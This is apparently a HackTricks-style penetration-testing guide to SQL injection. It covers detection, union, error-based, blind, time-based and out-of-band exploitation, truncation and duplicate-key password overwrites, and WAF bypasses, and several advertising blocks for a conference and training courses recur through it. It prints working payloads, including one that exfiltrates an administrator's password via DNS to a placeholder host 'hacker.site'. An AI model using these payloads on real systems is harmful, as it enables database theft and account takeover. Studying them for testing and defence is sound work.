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[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
An **SQL injection** is a security flaw that allows attackers to **interfere with database queries** of an application. This vulnerability can enable attackers to **view**, **modify**, or **delete** data they shouldn't access, including information of other users or any data the application can access. Such actions may result in permanent changes to the application's functionality or content or even compromision of the server or denial of service.
When a site appears to be **vulnerable to SQL injection (SQLi)** due to unusual server responses to SQLi-related inputs, the **first step** is to understand how to **inject data into the query without disrupting it**. This requires identifying the method to **escape from the current context** effectively.
Then, you need to know how to **fix the query so there isn't errors**. In order to fix the query you can **input** data so the **previous query accept the new data**, or you can just **input** your data and **add a comment symbol add the end**.
_Note that if you can see error messages or you can spot differences when a query is working and when it's not this phase will be more easy._
A reliable method to confirm an SQL injection vulnerability involves executing a **logical operation** and observing the expected outcomes. For instance, a GET parameter such as `?username=Peter` yielding identical content when modified to `?username=Peter' or '1'='1` indicates a SQL injection vulnerability.
Similarly, the application of **mathematical operations** serves as an effective confirmation technique. For example, if accessing `?id=1` and `?id=2-1` produce the same result, it's indicative of SQL injection.
In some cases you **won't notice any change** on the page you are testing. Therefore, a good way to **discover blind SQL injections** is making the DB perform actions and will have an **impact on the time** the page need to load.\
In some cases the **sleep functions won't be allowed**. Then, instead of using those functions you could make the query **perform complex operations** that will take several seconds. _Examples of these techniques are going to be commented separately on each technology (if any)_.
The best way to identify the back-end is trying to execute functions of the different back-ends. You could use the _**sleep**_**functions** of the previous section or these ones (table from [payloadsallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification):
If you can see the output of the query this is the best way to exploit it.\
First of all, wee need to find out the **number** of **columns** the **initial request** is returning. This is because **both queries must return the same number of columns**.\
To determine the number of columns in a query, incrementally adjust the number used in **ORDER BY** or **GROUP BY** clauses until a false response is received. Despite the distinct functionalities of **GROUP BY** and **ORDER BY** within SQL, both can be utilized identically for ascertaining the query's column count.
When the output of a query is visible, but a union-based injection seems unachievable, it signifies the presence of a **hidden union-based injection**. This scenario often leads to a blind injection situation. To transform a blind injection into a union-based one, the execution query on the backend needs to be discerned.
This can be accomplished through the use of blind injection techniques alongside the default tables specific to your target Database Management System (DBMS). For understanding these default tables, consulting the documentation of the target DBMS is advised.
Once the query has been extracted, it's necessary to tailor your payload to safely close the original query. Subsequently, a union query is appended to your payload, facilitating the exploitation of the newly accessible union-based injection.
For more comprehensive insights, refer to the complete article available at [Healing Blind Injections](https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f).
If for some reason you **cannot** see the **output** of the **query** but you can **see the error messages**, you can make this error messages to **ex-filtrate** data from the database.\
In this case you cannot see the results of the query or the errors, but you can **distinguished** when the query **return** a **true** or a **false** response because there are different contents on the page.\
This is the **same case as before** but instead of distinguish between a true/false response from the query you can **distinguish between** an **error** in the SQL query or not (maybe because the HTTP server crashes). Therefore, in this case you can force an SQLerror each time you guess correctly the char:
In this case there **isn't** any way to **distinguish** the **response** of the query based on the context of the page. But, you can make the page **take longer to load** if the guessed character is correct. We have already saw this technique in use before in order to [confirm a SQLi vuln](./#confirming-with-timing).
You can use stacked queries to **execute multiple queries in succession**. Note that while the subsequent queries are executed, the **results** are **not returned to the application**. Hence this technique is primarily of use in relation to **blind vulnerabilities** where you can use a second query to trigger a DNS lookup, conditional error, or time delay.
If **no-other** exploitation method **worked**, you may try to make the **database ex-filtrate** the info to an **external host** controlled by you. For example, via DNS queries:
a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
This query showcases a vulnerability when MD5 is used with true for raw output in authentication checks, making the system susceptible to SQL injection. Attackers can exploit this by crafting inputs that, when hashed, produce unexpected SQL command parts, leading to unauthorized access.
* **SQL Truncation Attack** (when there is some kind of **length limit** in the username or email) --> Create user with name: **admin \[a lot of spaces] a**
If the database is vulnerable and the max number of chars for username is for example 30 and you want to impersonate the user **admin**, try to create a username called: "_admin \[30 spaces] a_" and any password.
The database will **check** if the introduced **username****exists** inside the database. If **not**, it will **cut** the **username** to the **max allowed number of characters** (in this case to: "_admin \[25 spaces]_") and the it will **automatically remove all the spaces at the end updating** inside the database the user "**admin**" with the **new password** (some error could appear but it doesn't means that this hasn't worked).
More info: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html](https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html) & [https://resources.infosecinstitute.com/sql-truncation-attack/#gref](https://resources.infosecinstitute.com/sql-truncation-attack/#gref)
_Note: This attack will no longer work as described above in latest MySQL installations. While comparisons still ignore trailing whitespace by default, attempting to insert a string that is longer than the length of a field will result in an error, and the insertion will fail. For more information about about this check: [https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation](https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation)_
The `ON DUPLICATE KEY UPDATE` clause in MySQL is utilized to specify actions for the database to take when an attempt is made to insert a row that would result in a duplicate value in a UNIQUE index or PRIMARY KEY. The following example demonstrates how this feature can be exploited to modify the password of an administrator account:
An injection payload might be crafted as follows, where two rows are attempted to be inserted into the `users` table. The first row is a decoy, and the second row targets an existing administrator's email with the intention of updating the password:
- The query attempts to insert two rows: one for `generic_user@example.com` and another for `admin_generic@example.com`.
- If the row for `admin_generic@example.com` already exists, the `ON DUPLICATE KEY UPDATE` clause triggers, instructing MySQL to update the `password` field of the existing row to "bcrypt_hash_of_newpassword".
- Consequently, authentication can then be attempted using `admin_generic@example.com` with the password corresponding to the bcrypt hash ("bcrypt_hash_of_newpassword" represents the new password's bcrypt hash, which should be replaced with the actual hash of the desired password).
'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
'+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
Routed SQL injection is a situation where the injectable query is not the one which gives output but the output of injectable query goes to the query which gives output. ([From Paper](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt))
WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())Then(table_name)END) -> group_concat(if(table_schema=database(),table_name,null))
You can find a more in depth explaination of this trick in [gosecure blog](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/).\
Basically you can use the scientific notation in unexpected ways for the WAF to bypass it:
First of all, notice that if the **original query and the table where you want to extract the flag from have the same amount of columns** you might just do: `0 UNION SELECT * FROM flag`
It’s possible to **access the third column of a table without using its name** using a query like the following: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`, so in an sqlinjection this would looks like:
# This is an example with 3 columns that will extract the column number 3
-1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;
Or using a **comma bypass**:
# In this case, it's extracting the third value from a 4 values table and returning 3 values in the "union select"
-1 union select * from (select 1)a join (select 2)b join (select F.3 from (select * from (select 1)q join (select 2)w join (select 3)e join (select 4)r union select * from flag limit 1 offset 5)F)c
This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/](https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/)
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
Learn & practice AWS Hacking:<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">\
Learn & practice GCP Hacking: <imgsrc="/.gitbook/assets/grte.png"alt=""data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
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